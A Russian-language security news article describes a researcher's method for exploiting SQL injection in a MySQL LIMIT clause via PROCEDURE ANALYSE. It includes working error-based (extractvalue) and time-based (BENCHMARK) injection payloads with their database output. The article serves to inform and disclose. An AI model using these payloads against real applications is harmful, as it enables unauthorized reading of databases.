Эксперт продемонстрировал способ эксплуатации SQL-инъекции в MySQL с помощью LIMIT (обновлено)

Эксперт продемонстрировал способ эксплуатации SQL-инъекции в MySQL с помощью LIMIT (обновлено)

Предложенное исследователем решение базируется на известном методе - так называемой «инъекции на основе ошибки».

Исследователь безопасности Мауриций Продеус (Maurycy Prodeus)  продемонстрировал  способ эксплуатации SQL-инъекции с помощью LIMIT в MySQL5.x.

Пример запроса:

 SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point 

Важно, что данный запрос содержит ORDER BY. В MySQL невозможно использовать ORDER BY перед UNION. Без ORDER BY можно было бы с легкостью проэксплуатировать брешь с помощью синтаксической конструкции UNION. По словам Продеуса, проблема обсуждалась на сайтах  stackoverflow  и  sla.ckers , но, к сожалению, безрезультатно.

Синтаксическая конструкция SELECT в документации MySQL выглядит следующим образом:

SELECT

    [ALL | DISTINCT | DISTINCTROW ]

      [HIGH_PRIORITY]

      [STRAIGHT_JOIN]

      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]

      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]

    select_expr [, select_expr ...]

    [FROM table_references

    [WHERE where_condition]

    [GROUP BY {col_name | expr | position}

      [ASC | DESC], ... [WITH ROLLUP]]

    [HAVING where_condition]

    [ORDER BY {col_name | expr | position}

      [ASC | DESC], ...]

    [LIMIT {[offset,] row_count | row_count OFFSET offset}]

    [PROCEDURE procedure_name(argument_list)]

    [INTO OUTFILE 'file_name' export_options

      | INTO DUMPFILE 'file_name'

      | INTO var_name [, var_name]]

    [FOR UPDATE | LOCK IN SHARE MODE]]

После LIMIT могут использоваться PROCEDURE и INTO. INTO не вызывает интереса, если приложение не использует учетную запись базы данных с разрешением на запись файлов, что в наше время встречается довольно редко. Эту проблему можно решить, используя PROCEDURE.

Единственной процедурой, доступной по умолчанию в MySQL является ANALYSE:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

Процедура ANALYSE может также принимать два параметра:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

Посмотрим, оцениваются ли эти параметры:

mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);

Это дает немедленный ответ:

ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse’

Конечно, sleep() не вызывается. Тем не менее, Продеус продолжил поиски и нашел нужный вектор:

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

«Вышеуказанное решение базируется на известном методе - так называемой «инъекции на основе ошибки» (error based injection). Из этого следует, что в случае, если уязвимое приложение раскрывает ошибки в движке базы данных (это вполне реально, поскольку подобная практика довольно распространена), мы решаем проблему», - сообщил Продеус.

Брешь можно эксплуатировать даже в случае, если цель не отображает ошибки. Для этого необходимо использовать вышеописанный метод с известной техникой «инъекция на основе времени» (time based injection):

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

Примечательно, что в этом случае невозможно использовать SLEEP, поэтому нужно применить BENCHMARK.

Обновлено

К редакции SecurityLab обратились читатели относительно информации об эксплуатации SQL-инъекции в LIMIT. Подробная информация и именно этот метод эксплуатации БЮбыли опубликованы на форуме RDot еще в июне прошлого года исследователем NameSpace.

Где кванты и ИИ становятся искусством?

На перекрестке науки и фантазии — наш канал

Подписаться